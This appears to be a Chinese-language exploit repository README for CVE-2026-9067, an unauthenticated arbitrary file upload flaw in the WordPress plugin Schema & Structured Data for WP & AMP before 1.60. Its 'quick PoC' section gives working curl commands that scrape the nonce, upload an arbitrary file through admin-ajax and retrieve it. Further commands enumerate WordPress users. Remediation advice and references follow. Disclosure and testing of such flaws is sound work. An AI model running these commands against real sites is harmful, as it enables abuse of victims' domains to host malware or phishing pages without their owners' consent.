Polosss/By-Poloss..-..CVE-2026-9067

# POC & Xploit - 概念验证目录 本文档包含在 WordPress 安全测试环境中发现的漏洞文档与 exploit。 ## 漏洞列表 | CVE ID | 插件 | 严重程度 | 类型 | 状态 | |--------|--------|----------|------|--------| | [CVE-2026-9067](./CVE-2026-9067.md) | Schema & Structured Data for WP & AMP | 高危 (8.1) | 无限制文件上传 | 已记录 | ## CVE-2026-9067 ### 摘要 | 字段 | 值 | |-------|-------| | **CVE ID** | CVE-2026-9067 | | **插件** | Schema & Structured Data for WP & AMP | | **受影响版本** | < 1.60 | | **CWE** | CWE-434 (无限制危险类型文件上传) | | **CVSS v3.1** | 8.1 (高危) | | **发现者** | 0xBassia | ### 漏洞描述 1.60 版本之前的 Schema & Structured Data for WP & AMP 插件未对用于上传文件的 AJAX handlers 验证用户 capability，且未验证上传的文件类型。这使得未经身份验证的 attacker 能够上传 arbitrary 文件。 ### 影响 - **内容托管**: Attacker 可以在受害者的域名上托管 malicious 内容 - **磁盘消耗**: 上传 arbitrary 文件可能会耗尽磁盘空间 - **声誉滥用**: 从受害者的域名分发 malware、phishing pages **重要提示**: WordPress core 会拦截可执行文件（`.php`、`.phtml`、`.html`、`.svg`），因此此漏洞**不存在直接的 RCE 路径**。 ### 文件 ``` CVE-2026-9067/ ├── CVE-2026-9067.md # Dokumentasi lengkap (file ini) ├── CVE-2026-9067.py # Python exploit dengan multi-threading ├── CVE-2026-9067.sh # Bash/Shell PoC script └── CVE-2026-9067_exploit.sh # Alternative Bash PoC ``` ### 快速 PoC ``` # 步骤 1：获取 nonce NONCE=$(curl -s "https://yorbit7.ddev.site/" | grep -oP 'saswp_rf_(page_)?security_nonce["\x27]?\s*:\s*["\']([a-f0-9]{10})["\']' | grep -oP '[a-f0-9]{10}' | head -1) # 步骤 2：上传任意文件 curl -X POST 'https://yorbit7.ddev.site/wp-admin/admin-ajax.php' \ -F 'action=saswp_rf_form_image_upload' \ -F "saswp_rf_form_nonce=$NONCE" \ -F 'saswp-rf-form-image=@evil.csv;type=image/png;filename=evil.csv' # 步骤 3：访问已上传的文件 curl -s "https://yorbit7.ddev.site/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.csv" ``` ## 环境信息 | 字段 | 值 | |-------|-------| | **目标 URL** | https://yorbit7.ddev.site | | **PHP 版本** | 8.4 | | **数据库** | MariaDB 11.8 | | **WordPress 版本** | 7.0 | | **测试方法** | 基于 curl (黑盒测试) | ## 测试命令 ### 检查站点状态 ``` curl -s -o /dev/null -w "%{http_code}" https://yorbit7.ddev.site ``` ### 检查插件版本 ``` curl -s https://yorbit7.ddev.site/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt | grep -i "Stable tag:" ``` ### 枚举用户 ``` curl -s https://yorbit7.ddev.site/wp-json/wp/v2/users | jq '.[] | {id, name, slug}' ``` ## 修复方案 1. **升级插件**: 将 Schema & Structured Data for WP & AMP 更新至 1.60 或更高版本 2. **禁用插件**: 如果无法升级，请禁用该插件 3. **强化安全**: - 设置 `DISALLOW_FILE_MODIFICATIONS` 常量 - 通过 `.htaccess` 禁用 uploads directory 中的 PHP 执行 - 实施 WAF 规则 ## 参考 - [NVD CVE-2026-9067](https://nvd.nist.gov/vuln/detail/CVE-2026-9067) - [WPScan 漏洞数据库](https://wpscan.com/vulnerability/7fac98eb-f82c-4705-a956-aba650945826/) - [WordPress 插件页面](https://wordpress.org/plugins/schema-and-structured-data-for-wp/) - [原研究员: 0xBassia](https://github.com/0xBassia)

标签：CISA项目, Web安全, 安全漏洞, 应用安全, 漏洞PoC, 网络信息收集, 蓝队分析, 逆向工具